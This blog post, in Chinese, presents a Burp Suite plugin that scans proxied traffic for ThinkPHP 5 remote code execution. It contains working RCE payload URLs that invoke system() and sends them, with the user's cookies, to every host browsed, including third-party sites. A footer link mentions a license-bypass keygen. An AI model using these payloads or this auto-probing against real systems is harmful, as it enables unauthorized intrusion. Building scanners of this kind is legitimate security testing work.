Burp 一个简易的tp5-rce被动扫描插件

已于 2022-04-19 18:05:17 修改
阅读量812 收藏 2
点赞数 2
分类专栏: 安全开发 文章标签: web安全 python
于 2022-04-19 17:29:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263451/article/details/124279128
版权

最近学了学burpsuite的插件开发,然后尝试写了一个tp5的rce漏洞的检测插件,这个作用于proxy和repeater模块,可以被动扫描所有经过代理的流量。如果存在漏洞,会产生报警并显示payload

插件代码

# -*- coding:utf-8 -*-
from burp import IBurpExtender
from burp import IHttpListener
from burp import IHttpRequestResponse
from burp import IRequestInfo
from burp import IHttpService

import re
import urllib2
import ssl
import sys
import random

print("check tp5\n author:rerce")

class BurpExtender(IBurpExtender,IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()  #这个对象有很多好用的方法帮助我们解析http请求
        self._callbacks.setExtensionName("tpcheck")
        self.cookies = callbacks.getCookieJarContents() #返回一个ICooike对象,这个用来获取cooike
        self.paylaod_list={
            "5.0":["/?s=index|think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=echo%20",
                   "/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20",
                   "/index.php?s=captcha _method=__construct&method=get&filter[]=system&get[]=echo%20"],
            "5.1":["/?s=index/\\think\Request/input&filter[]=system&data=echo%20",
                   "/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20",
                   "/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"]

        }
        callbacks.registerHttpListener(self)    #注册我们这个插件为一个监听器
        reload(sys)
        sys.setdefaultencoding('utf8')

    # def get_request_info(self, request):
    #
    #
    #     return analyzedRequest, reqUrl
    # 版本探测
    def detect(self,url_base):
        url_base = url_base+"/?s=xxx"
        #print(url_base)
        try:
            request = urllib2.Request(url_base)
            content = urllib2.urlopen(request).read()
            version = re.findall('<span>V(.*?)</span>', str(content))
            if len(version) == 0:
                return "ALL"
            elif version[0][:3] == "5.0":
                return "5.0"
            elif version[0][:3] == "5.1":
                return "5.1"
            else:
                return "ALL"
        except urllib2.HTTPError as err:
            version = re.findall('<span>V(.*?)</span>', str(err.read()))
            if len(version) == 0:
                return "ALL"
            elif version[0][:3] == "5.0":
                return "5.0"
            elif version[0][:3] == "5.1":
                return "5.1"
            else:
                return "ALL"

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        if toolFlag == 64 or toolFlag == 4: #判断是否为proxy或者repeater模块
            if not messageIsRequest:    # 判断是否为返回信息
                request = messageInfo.getRequest()
                HttpService = messageInfo.getHttpService()
                host = HttpService.	getHost()
                port = HttpService.	getPort()
                Protocol = HttpService.getProtocol()
                url_base = Protocol+"://"+host+":"+str(port)
                #print(Protocol)
                #print(host+str(port)+Protocol)
                #print(request)
                analyzedRequest = self._helpers.analyzeRequest(request)
                reqHeader = analyzedRequest.getHeaders()
                #print(reqHeader[1])
                #key = re.findall('''name="key" value="(.*?)"''', str(res.text))[0]
                #domain = "".join(re.findall('[^Host: ]',a))
                #print(domain)
                #print(self.cookies[0].getName())

                # proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080'})
                # opener = urllib2.build_opener(proxy)
                # urllib2.install_opener(opener)
                # 获取该情报的cooike
                cooike = ""
                for i in self.cookies:
                    if i.getDomain() in host:
                        cooike += i.getName() + "=" + i.getValue() + ";"
                #print(cooike)
                headers = {
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
                    "Content-Type": "application/x-www-form-urlencoded",
                    "Cookie": cooike
                }
                ssl._create_default_https_context = ssl._create_unverified_context  # 忽略证书,防止证书报错
                # 判断目标站的tp版本,不同版本有不同payload
                version = self.detect(url_base)
                #print(version)
                if version == "ALL":
                    payload_loading = self.paylaod_list['5.0'] + self.paylaod_list['5.1']
                else:
                    payload_loading = self.paylaod_list[version]
                result = []
                key = str(random.randint(1000000000,10000000000))
                # 打payload过去
                for payload in payload_loading:
                    #payload = "/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami"
                    payload = payload.split(" ")
                    #print(payload)
                    if len(payload) == 1:
                        url = url_base+payload[0]+key
                        try:
                            request = urllib2.Request(url, headers=headers)
                            body = urllib2.urlopen(request).read()
                            if key in body:
                                result.append(payload[0])
                        except urllib2.HTTPError as err:
                            if key in err.read():
                                result.append(payload[0])
                    else:
                        #print(payload)
                        url = url_base + payload[0]
                        data = payload[1]+key
                        try:
                            request = urllib2.Request(url, data=data, headers=headers)
                            body = urllib2.urlopen(request).read()
                            if key in body:
                                result.append(payload[0]+"------------->"+payload[1])
                        except urllib2.HTTPError as err:
                            if key in err.read():
                                result.append(payload[0]+"------------->"+payload[1])
                #print(result)
                # 如果有攻击成功的就会将payload添加到result
                if len(result):
                    print('扫描完毕:')
                    print(host+' 存在TP5RCE漏洞')
                    for i in result:
                        if i != result[-1]:
                            print("payload: "+ i + key + '\n')
                        else:
                            print("payload: " + i + key)
                    print("-"*50)
                else:
                    print('扫描完毕:\n' + host + ' 不存在TP5RCE漏洞')
                    print("-" * 50)

使用方法

成功导入插件后,如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X1GlJlYC-1650360415269)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220419171644076.png)]
浏览器打开代理,访问不存在漏洞的站点,期间对于所有的请求都会进行漏洞检测,然后会在output中显示存不存在tp5的rce漏洞
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R3ADwJDK-1650360415270)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220419171843645.png)]
现在打开我们搭建的存在漏洞的tp站点
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Oz8XvDGP-1650360415271)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220419172113934.png)]
可以看到当我访问127.0.0.1时一共发出了两个请求,我们的127.0.0.1存在漏洞,且给出了payload。而e.topthink.com是没有漏洞的
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-g8NGyymZ-1650360415271)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220419172156582.png)]

这个插件效率还不是很高,后面深入学习后会一直修改

参考

https://www.anquanke.com/post/id/215351#h3-17

https://portswigger.net/burp/extender/api/index.html

浔阳江头夜送客丶
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BurpSuite插件(BP插件、武装BP)
墨痕诉清风的博客
03-07 1863
目录 解决光标错位 HAE Domain Hunter Pro passive-scan-client-0.3.0 LinkFinder HTTPHeadModifer 解决光标错位 一般我拿到Burp必做的一件事就是把光标错位调整好: User options-Display-HTTP Message Display 黑体-24px HAE https://github.com/gh0stkey/HaE 此时才把插件导入进来,需要配置你的HAE正则。 公共规..
被动扫描工具(myscan)
lza20001103的博客
08-29 1704
被动扫描工具(myscan) 文章目录被动扫描工具(myscan)前言运行原理演示地址如何运行检测插件优势与不足 前言 myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。 运行原理 myscan依赖burpsuite和redis,需启动redis和burpsuite插
一款检测Struts2 RCE漏洞的burp被动扫描插件-Struts2Burp
siu~
08-24 384
一款检测Struts2 RCE漏洞的burp被动扫描插件,仅检测url后缀为.do以及.action的数据包
22款burpsuite常用插件(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
06-25 2323
前言Burp Suite是一款强大的用于Web应用程序安全测试的工具。Burp Suite的一个关键特性是通过扩展功能的使用来扩展其功能。这些扩展允许用户自定义Burp Suite以满足他们特定需求,简化他们的工作流程。此外,扩展可用于将Burp Suite与其他工具和平台集成,扩大安全测试的范围和效率。使用Burp Suite扩展还可以帮助消除手动任务,节省安全专业人员的时间和资源。
BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)
HWHXY的博客
09-19 606
插件开发学习第10套。
BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
HWHXY的博客
09-13 324
插件开发学习第8套。继续上一章的分析。
BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
HWHXY的博客
09-03 681
插件开发学习第7套。继续上一章的分析。
BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-76)
HWHXY的博客
09-19 376
插件开发学习第11套。
基于实战的Burp Suite插件使用Tips
网安君的博客
01-17 5015
基于实战的Burp Suite插件使用技巧 本篇文章首发于奇安信攻防社区 0×00前言 ​ Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。在渗透测试中,我们使用Burp Suite将使得测试工作变得更加容易和方便,即使在不需要娴熟的技巧的情况下,只有我们熟悉Burp Suite的使用,也使得渗透测试工作变得轻松和高效。 Burp Suite可执行程序是java文件类型的jar文件,免费版的可以从免费版下载地址
能让你躺着挖洞的BurpSuite插件
tangshuangsss的专栏
08-04 2536
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介说躺有点夸张了哈,但是一些好用的BurpSuite插件的确能让你在挖洞的过程中节省大量的时间。插件列表:1.ShiroScan:被动发现Shiro反序列化漏洞 2.FastJsonScan:被动式FastJson检测插件 3.log4j2burpscanner:被动发现log4j2RCE漏...
Burpsuite-UAScan:burpsuite插件被动进行未授权访问扫描
05-23
被动扫描经过Burpsuite的每一个请求 通过修改Cookie头重新访问判断是否存在未授权访问(越权)问题 如果扫描到未授权访问的URL会显示到空白区域中 采用Jaro-Winkler距离算法进行页面相似度判断,提高准确度 加入过滤...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-...
Burpsuite-JSScan:burpsuite插件:主动和被动进行JS扫描并分析其中的可利用点
05-23
被动扫描模块将会分析每一个经过burpsuite的请求,如果是js文件就会记录 排除常见的JS库,只分析自定义JS,有效发现目标 将扫描到的自定义JS文件自动添加到自带字典中,逐步完善字典 拓展 具体可利用点的分析,例如...
burpsuite分块传输插件chunked-coding-converter.0.2.1.jar
01-25
burpsuite分块传输插件,一键生成分块传输请求,用于bypass waf等
BurpSuite使用的插件HaE-2.6.1.jar
05-01
BurpSuite上使用的插件HaE-2.6.1.jar Extensions->Installed->Add->Extension details->Select file,选择路径下的此文件
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 977
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
中小企业常见的网络安全问题及防范措施
w651428055的博客
07-22 687
在当今数字化时代,Web应用程序已经成为企业与用户互动的主要平台,但随之而来的是日益复杂的网络安全威胁。为了保护Web应用程序免受各种攻击,Web应用程序防火墙(WAF)应运而生。本文将深入探讨WAF的概念、工作原理、分类、特点以及如何选择和部署WAF,帮助读者更全面地理解WAF在网络安全中的重要作用。
网络安全相关竞赛比赛
黑战士的博客
07-18 1041
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
给我一个burp-loader-keygen
07-12
burp-loader-keygen是一个用于生成Burp Suite Loader密钥的工具。Burp Suite是一款常用的Web应用程序安全测试工具,而Burp Suite Loader则是一种用于绕过Burp Suite的许可证验证的工具。使用burp-loader-keygen可以...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值